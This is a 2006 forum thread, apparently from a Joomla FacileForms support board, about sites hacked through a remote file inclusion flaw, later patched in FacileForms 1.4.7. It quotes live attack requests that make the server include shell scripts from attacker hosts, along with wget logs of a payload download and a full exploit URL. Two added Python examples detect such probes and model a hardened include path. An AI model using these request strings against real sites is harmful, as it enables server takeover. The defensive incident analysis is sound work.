formsuser
« on: September 14, 2006, 10:27:40 am »
Hi all,
I have a Joomla website using the FacileForms component. It's been hacked three times now, and each time it's been this component. The first time I took the hint and implemented standard security in line with articles on the Joomla.org website. The second time I implemented even more security measures and assured the client the site was now as secure as I could make it. This third time, the host has disabled the FacileForms component directory (see why below) and informed me I should upgrade to the latest version. I was already using 1.4.6g, which is still the latest version.
So now I'm coming here for some expert assistance. Here is what my host sent me after the third attack. I've replaced my website's address with "website.com", the hacker's IP with 111.222.333.444 and my website's IP with 000.000.000.000.
===== START HOST MESSAGE =====

We need to inform you that your hosting account for website.com has been hacked and used to run illegal software on the server. To prevent further abuse of your account and the server, we have disabled the following location on your account:

/www/www/components/com_facileforms

Here is how the hackers have exploited your account:

111.222.333.444 - - [10/Sep/2006:17:43:52 -0400] "GET /component/option,com_facileforms/components/com_facileforms/facileforms.frame.php?ff_compath=http://myspace.si/images/cmd.gif? HTTP/1.1" 200 20 "-" "libwww-perl/5.79"

Please check the following process listing for your user:

username 24522 9526 0 Sep10 ? SN 0:00 /usr/local/bin/php4.cgi index.php
PATH=/usr/local/bin:/usr/bin:/bin
DOCUMENT_ROOT=/home/username/www/www
HTTP_CONNECTION=close
HTTP_HOST=www.website.com
HTTP_USER_AGENT=libwww-perl/5.79
REDIRECT_QUERY_STRING=ff_compath=http://myspace.si/images/cmd.gif?
REDIRECT_STATUS=200
REDIRECT_URL=/component/option,com_facileforms/components/com_facileforms/facileforms.frame.php
REMOTE_ADDR=111.222.333.444
REMOTE_PORT=43405
SCRIPT_FILENAME=/home/username/www/www/index.php
SERVER_ADDR=000.000.000.000
SERVER_ADMIN=admin@website.com
SERVER_NAME=www.website.com
SERVER_PORT=80
SERVER_SOFTWARE=Apache
GATEWAY_INTERFACE=CGI/1.1
SERVER_PROTOCOL=HTTP/1.1
REQUEST_METHOD=GET
QUERY_STRING=ff_compath=http://myspace.si/images/cmd.gif?
REQUEST_URI=/component/option,com_facileforms/components/com_facileforms/facileforms.frame.php?ff_compath=http://myspace.si/images/cmd.gif?
SCRIPT_NAME=/index.php

Please upgrade any third party software you are using on your account to the latest versions. Also, if you are using any custom scripts, please secure them as soon as possible.

===== END HOST MESSAGE =====
My questions are:
What am I doing wrong? What additional information, if any, is required to determine what I'm doing wrong? If I'm not doing anything wrong, is this a vulnerability? If that's the case, was it irresponsible to post it here?
Thanks in advance.
formsuser
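Added example, not from the original post or from the FacileForms project: a small Python script that scans Apache combined-format access log lines for the shape visible in the host's notice above, a query parameter whose value is itself a URL (ff_compath=http://...?), and for each hit pulls out the SEF component name from the option,com_xxx path segment, the script name, and whether the client was libwww-perl. The log lines inside it are constructed to mirror the ones in this thread, with placeholder hosts; names such as find_rfi_attempts are this example's own.

```python
"""Flag remote-file-inclusion (RFI) probes in Apache combined-format access logs.

The telltale shape, as in the host's notice in this thread, is a query parameter
whose value is itself a URL, usually ending in '?' so that anything the script
appends to it becomes a harmless query string on the attacker's server.
"""
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Apache "combined" log format: host ident user [time] "request" status bytes "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<bytes>\S+) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)
# Joomla 1.0 SEF URLs carry the component as a path segment: /option,com_xxx/
SEF_OPTION_RE = re.compile(r'(?:^|/)option,(com_[A-Za-z0-9_]+)')
REMOTE_SCHEMES = ("http://", "https://", "ftp://", "ftps://")


def parse_line(line):
    """Split one combined-format line into its fields, or None if it does not match."""
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None


def remote_url_params(target):
    """Return [(name, value)] for query parameters whose value is a remote URL."""
    query = urlsplit(target).query
    hits = []
    for name, value in parse_qsl(query, keep_blank_values=True):
        # parse_qsl already decoded once; decode again so a double-encoded
        # 'http%253A%252F%252F...' is still caught.
        candidate = unquote(value).strip().lower()
        if candidate.startswith(REMOTE_SCHEMES):
            hits.append((name, value))
    return hits


def sef_component(path):
    """Extract com_xxx from a SEF-style path, or None if there is no option, segment."""
    m = SEF_OPTION_RE.search(path)
    return m.group(1) if m else None


def find_rfi_attempts(lines):
    """Return one finding per log line that carries a URL-valued parameter."""
    findings = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        hits = remote_url_params(rec["target"])
        if not hits:
            continue
        path = urlsplit(rec["target"]).path
        findings.append({
            "host": rec["host"],
            "status": int(rec["status"]),
            "component": sef_component(path),
            "script": path.rsplit("/", 1)[-1],
            "params": hits,
            # every attacker request quoted in this thread came from libwww-perl
            "scripted_client": rec["agent"].startswith("libwww-perl"),
        })
    return findings


# Constructed sample log: two probes shaped like the thread's, one benign request.
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Sep/2006:17:43:52 -0400] "GET /component/option,com_facileforms/components/com_facileforms/facileforms.frame.php?ff_compath=http://attacker.example/cmd.gif? HTTP/1.1" 200 20 "-" "libwww-perl/5.79"',
    '198.51.100.9 - - [28/Sep/2006:01:05:00 -0400] "GET /index.php/option,com_facileforms/component/option,com_facileforms/components/com_facileforms/facileforms.frame.php?ff_compath=http://attacker.example/cmd.do%3f HTTP/1.1" 200 - "-" "libwww-perl/5.76"',
    '192.0.2.20 - - [28/Sep/2006:01:06:00 -0400] "GET /index.php?option=com_content&task=view&id=5 HTTP/1.1" 200 8123 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for finding in find_rfi_attempts(SAMPLE_LOG):
        print(finding)
```

To run it over a real log, pass the open file to find_rfi_attempts(). A 200 on such a probe, as on every line quoted in this thread, means the request was answered by something rather than rejected, and that is the line to escalate; the REDIRECT_URL and SCRIPT_NAME=/index.php in the host's process listing show why the non-existent facileforms.frame.php still produced a hit: Apache rewrote the request to index.php.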
schmiro77
« Reply #1 on: September 14, 2006, 11:25:13 am »
Hello,
In FF 1.4.6g there is no such file 'facileforms.frame.php' anymore.
Therefore, just some questions for clarification:
1. Are you sure that you are currently using FF 1.4.6g?
2. Are you sure that you were already using FF 1.4.6g at the time those web log entries were created?
3. Are you sure that you cleaned up your folders properly and that there is currently no such file 'facileforms.frame.php'?
Regards, Ralf
-<>---------------- Ralf Schmitt-Roquette
Cilo
« Reply #2 on: September 16, 2006, 09:24:08 am »
Hello, I have the same problem on my server. A Joomla website has been hacked 2 times. Here is the log:

a15176468.alturo-server.de - - [16/Sep/2006:05:06:22 +0200] "GET /component/option,com_facileforms/components/com_facileforms/facileforms.frame.php?ff_compath=http://ar.geocities.com/lynxbt1/spread.txt? HTTP/1.1" 200 5 "-" "libwww-perl/5.76"
wpc2239.amenworld.com - - [16/Sep/2006:05:06:31 +0200] "GET /component/option,com_facileforms/components/com_facileforms/facileforms.frame.php?ff_compath=http://ar.geocities.com/lynxbt1/spread.txt? HTTP/1.1" 200 5 "-" "libwww-perl/5.79"
a15176468.alturo-server.de - - [16/Sep/2006:05:09:49 +0200] "GET /component/option,com_facileforms/components/com_facileforms/facileforms.frame.php?ff_compath=http://ar.geocities.com/lynxbt1/spread.txt? HTTP/1.1" 200 - "-" "libwww-perl/5.76"
a15176468.alturo-server.de - - [16/Sep/2006:05:09:49 +0200] "GET /component/option,com_facileforms/components/com_facileforms/facileforms.frame.php?ff_compath=http://ar.geocities.com/lynxbt1/spread.txt? HTTP/1.1" 200 - "-" "libwww-perl/5.76"
wpc2239.amenworld.com - - [16/Sep/2006:05:09:49 +0200] "GET /component/option,com_facileforms/components/com_facileforms/facileforms.frame.php?ff_compath=http://ar.geocities.com/lynxbt1/spread.txt? HTTP/1.1" 200 - "-" "libwww-perl/5.79"

The error log shows the download of the script:

--05:04:49-- http://ar.geocities.com/lynxbt1/v6 => `v6'
--05:04:49-- http://ar.geocities.com/lynxbt1/v6 => `v6'
--05:04:49-- http://ar.geocities.com/lynxbt1/v6 => `v6'
Connecting to ar.geocities.com:80... Connecting to ar.geocities.com:80... Connecting to ar.geocities.com:80... connected!
HTTP request sent, awaiting response... connected! HTTP request sent, awaiting response... connected! HTTP request sent, awaiting response... 200 OK
Length: 14,917 [text/plain] 0K ...200 OK Length: 14,917 [text/plain] 0K ...200 OK Length: 14,917 [text/plain] 0K .......... ......... ......... .... 100% @ 47.92 KB/s .. 100% @ 47.61 KB/s .. 100% @ 47.61 KB/s
05:04:50 (47.76 KB/s) - `v6' saved [14917/14917]
05:04:50 (47.61 KB/s) - `v6' saved [14917/14917]
05:04:50 (47.61 KB/s) - `v6' saved [14917/14917]

I use FacileForms 1.4.6g (seen in the xml file). I don't understand how, because there is no facileforms.frame.php file in the folder. After the second hack, I put the security advice define( 'RG_EMULATION', 0 ); in global.php; I hope it's the solution.
Best regards, Cyril
fvds
« Reply #4 on: September 17, 2006, 04:50:55 pm »
The FacileForms version is displayed at the top of the configuration screen. It should be 1.4.6....
If you are still being hacked, check on your server to see if the file facileforms.frame.php exists. It should not be there, as it's no longer needed in FF 1.4.6.
If it's there, you probably didn't follow the upgrade instructions (in the Documentation on the FacileForms.biz site). If you find the facileforms.frame.php file, delete it!
fvds
« Reply #5 on: September 23, 2006, 05:55:09 pm »
Are you using a SEF component?
shumisha
« Reply #6 on: September 25, 2006, 07:03:23 pm »
Please could you give an update on the status of your site security? Were you all using a properly installed 1.4.6g version of FF? There are a few reports of these things happening, and I can't figure out whether there is any reality to these, or if it is mostly errors in the upgrade process.
Thanks for any information
boldee
« Reply #7 on: September 25, 2006, 09:02:11 pm »
The insecurity is due to weaknesses in other components such as SEF; the problems being reported are all related to an FF file that no longer exists in 1.4.6, therefore it is impossible for FF to open a backdoor.
shumisha
« Reply #8 on: September 25, 2006, 09:13:07 pm »
Hello boldee,
Thanks for your answer. I am continuing the contact with the 2 users reporting the issue, to find out whether they are using an SEF component (which one is causing the issue?), and more details if not.
shumisha
« Reply #9 on: September 27, 2006, 12:55:14 pm »
Hello all,
Just an update: these two users are indeed using open-sef, RC5 sp2. At the moment, I do not have an answer about whether their version is from before or after the security patch released mid-July 06.
facile
« Reply #10 on: September 27, 2006, 08:09:51 pm »
Currently a vulnerability in mod_rewrite is under suspicion. The hack seems to be possible with any SEF, even the one built into Joomla, according to reports. It is not yet certain whether the SEF itself is really involved, or only some .htaccess settings which are used/required by most SEFs.
Peter
shumisha
« Reply #11 on: September 27, 2006, 08:15:17 pm »
Thanks for this information. Could you provide a link with information about this?
dhuelsmann
« Reply #12 on: September 28, 2006, 01:11:11 am »
I, too, have been hacked three times over the past week and a half. The first time I was not on the current release of Facile Forms, so I cleared out the little surprises the buggers left, uninstalled Facile Forms and re-installed the latest version. They got to me again, and they were using this command:

http://www.mystite.com/index.php/option,com_facileforms/component/option,com_facileforms/components/com_facileforms/facileforms.frame.php?ff_compath=http://see-my-ip.info/cmd.do%3f

Note: Moderators, take out anything from the above you don't want to show.

I realize you are saying that facileforms.frame.php isn't in the code release, but I know I completely deleted the directory when I upgraded. That command opens the site wide open to upload, download, rename anything anywhere in any directory. Yes, I do use the core SEF. If this is related to the SEF, why aren't they hacking through some other component? I have had to completely remove Facile Forms to eliminate the hacks. (And I really like this component!)
Regards, Dave
facile
« Reply #13 on: September 28, 2006, 04:51:30 am »
Thanks for all the information. I now got access to a server which has this vulnerability and hope to track down how it works today.
UPDATE:
The vulnerability has been identified and there will be a patch for 1.4.6g, as well as a new release 1.4.7, available shortly.
UPDATE:
FacileForms 1.4.7 as well as a patch for 1.4.6 are available now.
« Last Edit: September 28, 2006, 07:40:30 am by facile »
Peter
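Added example, mine and not the project's patch (the thread does not say how the fix works): the classic PHP shape behind a request like ff_compath=http://host/cmd.gif? is include($ff_compath . '/' . $file) with allow_url_fopen on, where PHP opens the http:// target as a stream, and the attacker's trailing '?' turns the appended file name into a query string so their server serves cmd.gif unchanged. The Python below models that string construction, shows what the attacker's web server actually receives, and beside it a hardened resolver that refuses any stream-wrapper scheme or NUL byte and confines the path to the component directory. COMPONENT_DIR is the path from the host's notice earlier in this thread; the appended name facileforms.class.php and the function names are this example's own placeholders, not FacileForms code.

```python
"""Model of the include-path bug behind 'ff_compath=http://host/cmd.gif?' (added example).

Assumption, not stated in the thread: the vulnerable script did the classic
    include($ff_compath . '/' . $file);
With allow_url_fopen enabled, PHP 4/5 opens http:// and ftp:// targets as
streams, so the whole include becomes a remote fetch. The trailing '?' turns
the appended '/file' into a query string, so the server returns cmd.gif as-is.
"""
import os
from urllib.parse import urlsplit

COMPONENT_DIR = "/home/username/www/www/components/com_facileforms"  # path from the host's notice
REQUIRED_FILE = "facileforms.class.php"  # hypothetical name the script appends


def naive_include_target(compath):
    """Mirror the unsafe idiom: blindly concatenate the user-supplied base path."""
    return compath + "/" + REQUIRED_FILE


def include_scheme(target):
    """Stream-wrapper scheme PHP would select for this target ('' for a plain file path).

    Any scheme at all is treated as hostile below; a colon in a local include
    path is not something a well-formed component ever needs.
    """
    return urlsplit(target).scheme.lower()


def attacker_view(target):
    """(path, query) the attacker's web server receives when the target is remote."""
    u = urlsplit(target)
    return u.path, u.query


def safe_include_target(compath, base_dir=COMPONENT_DIR):
    """Hardened resolution: no wrapper scheme, no NUL truncation, no escape from base_dir."""
    if include_scheme(compath) or "\0" in compath:
        raise ValueError("remote or malformed include path rejected")
    base = os.path.realpath(base_dir)
    # realpath collapses '..' and symlinks before the containment check,
    # so '../../etc' and an absolute '/etc' both land outside base.
    candidate = os.path.realpath(os.path.join(base, compath))
    if candidate != base and not candidate.startswith(base + os.sep):
        raise ValueError("include path escapes the component directory")
    return os.path.join(candidate, REQUIRED_FILE)


def is_rejected(compath, base_dir=COMPONENT_DIR):
    """True if safe_include_target() refuses this value."""
    try:
        safe_include_target(compath, base_dir)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    probe = "http://attacker.example/cmd.gif?"
    target = naive_include_target(probe)
    print("naive target :", target)
    print("wrapper      :", include_scheme(target) or "(local file)")
    print("server sees  :", attacker_view(target))
    for value in (probe, "../../../../etc/passwd", "/etc", "", "sub"):
        print(repr(value), "->", "rejected" if is_rejected(value) else safe_include_target(value))
```

Server-side, the 2006-era mitigation was allow_url_fopen = Off in php.ini (PHP 5.2 later split remote includes out into a separate allow_url_include switch); the resolver above is the application-side check that holds regardless of that setting, which matters on shared hosting where you do not control php.ini.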
jdog
« Reply #14 on: September 30, 2006, 06:04:56 pm »
Holy crap, I was shocked when I tried the URL on my site.
So why do the SEF components create a vulnerability, and is there any way to still use them with FF without security risks?